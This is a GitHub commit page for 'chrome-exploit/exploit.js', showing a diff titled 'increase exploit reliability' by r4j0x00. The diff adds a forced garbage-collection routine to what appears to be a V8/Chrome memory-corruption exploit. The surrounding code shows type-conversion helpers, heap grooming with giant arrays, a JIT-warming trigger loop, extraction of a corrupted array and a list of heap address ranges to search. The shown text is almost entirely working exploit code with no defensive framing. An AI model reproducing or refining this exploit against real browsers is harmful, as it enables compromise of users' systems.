Skip to content

Commit 457c8e8

Browse files
author
r4j0x00
committed
increase exploit reliability
1 parent d3a2107 commit 457c8e8

File tree

1 file changed

+8
-0
lines changed

1 file changed

+8
-0
lines changed

chrome-exploit/exploit.js

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -21,6 +21,12 @@ function itof(val) {
2121
return f64_buf[0];
2222
}
2323

24+
function gc() {
25+
for (let i = 0; i < 100; i++) {
26+
new ArrayBuffer(0x100000);
27+
}
28+
}
29+
2430
array = Array(0x40000).fill(1.1);
2531
args = Array(0x100 - 1).fill(array);
2632
args.push(Array(0x40000 - 4).fill(2.2));
@@ -48,6 +54,8 @@ function trigger(array) {
4854
for (let i = 0; i < 30000; ++i) {
4955
trigger(giant_array);
5056
}
57+
gc();
58+
5159
corrupted_array = trigger(giant_array)[1];
5260

5361
var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];

0 commit comments

Comments
 (0)